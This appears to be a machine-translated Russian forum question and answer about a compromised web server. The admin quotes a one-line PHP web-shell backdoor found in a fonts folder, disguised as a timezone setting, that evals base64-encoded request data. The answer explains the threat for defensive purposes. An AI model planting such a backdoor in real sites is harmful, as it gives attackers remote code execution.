Назад | Перейти на главную страницу

Вредоносная активность в EXE: / usr / bin / php CMD: / usr / bin / php

Возможный дубликат:
Как мне поступить с взломанным сервером?

Проверил lfd.log и заметил блокировку скрипта:

Jan 10 22:01:36 xxx lfd[871]: *User Processing* PID:27023 Kill:0 User:xxxx Time:610472 EXE:/usr/bin/php CMD:/usr/bin/php /home/xxxx/public_html/fonts/article5.class.inc.php

Похоже, скрипт пытается выполнить / usr / bin / php, но когда я вижу код, это простой однострочный файл

<?php
function_exists('date_default_timezone') ? date_default_timezone_set('America/Los_Angeles') : @eval(base64_decode($_REQUEST['c_id']));

У кого-нибудь есть подобный опыт, и есть ли способ узнать, что вызывает вызов / usr / bin / php? Журналы говорят, что скрипт вызывается через POST.

Кто-то поместил в этот каталог сценарий атаки. Если eval не деактивирован в вашей конфигурации PHP, это позволит злоумышленнику выполнить произвольный код PHP, который он отправляет вместе с запросом.

Сценарий вызывается с помощью простого запроса HTTP POST.

Вы должны считать вашу систему скомпрометированной и попытаться выяснить, как злоумышленнику удалось разместить этот скрипт.